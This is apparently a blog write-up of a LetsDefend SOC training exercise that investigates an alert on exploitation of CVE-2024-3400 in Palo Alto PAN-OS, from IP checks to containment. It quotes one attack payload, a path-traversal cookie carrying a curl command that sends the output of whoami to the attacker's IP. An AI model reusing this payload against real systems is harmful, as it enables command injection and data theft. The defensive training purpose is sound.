LetsDefend: SOC274 - Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024-3400)

Upon examining source IP of 144[.]172[.]79[.]92, we see that it is flagged as malicious. As the malicious IP is the source and destination is the company private IP, we can identify that this is malicious ingress traffic. As the cookie looks like this. SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)` We can label this as malicious command injection traffic. As the hostname of the machine is PA-Firewall-01, we can check for any emails for a potential pentesting engagement happening. We do see that one result is returned upon searching firewall, but the IP address is not relavant to us. Upon searching the raw logs, we get something back. Upon examining the logs, we see that the HTTP communication between the server with the malicious IP are all HTTP response code of 200. The endpoint login.esp specifically has content length of 11364. As we can see, the one and only login.esp endpoint log is the one where the cookie is modified for command execution, indicating a success exploitation. We can then contain the compromised host. We can then add our artifacts like so.

Apr 25, 2025 - 11:47
 0
LetsDefend: SOC274 - Palo Alto Networks PAN-OS Command Injection Vulnerability Exploitation (CVE-2024-3400)

Image description

Upon examining source IP of 144[.]172[.]79[.]92, we see that it is flagged as malicious.

Image description

As the malicious IP is the source and destination is the company private IP, we can identify that this is malicious ingress traffic.

As the cookie looks like this.

SESSID=./../../../opt/panlogs/tmp/device_telemetry/hour/aaa`curl${IFS}144.172.79.92:4444?user=$(whoami)`

We can label this as malicious command injection traffic.

As the hostname of the machine is PA-Firewall-01, we can check for any emails for a potential pentesting engagement happening.

Image description

We do see that one result is returned upon searching firewall, but the IP address is not relavant to us.

Image description

Upon searching the raw logs, we get something back.

Image description

Upon examining the logs, we see that the HTTP communication between the server with the malicious IP are all HTTP response code of 200.

Image description

The endpoint login.esp specifically has content length of 11364.

As we can see, the one and only login.esp endpoint log is the one where the cookie is modified for command execution, indicating a success exploitation.

Image description

We can then contain the compromised host.

Image description

We can then add our artifacts like so.

Image description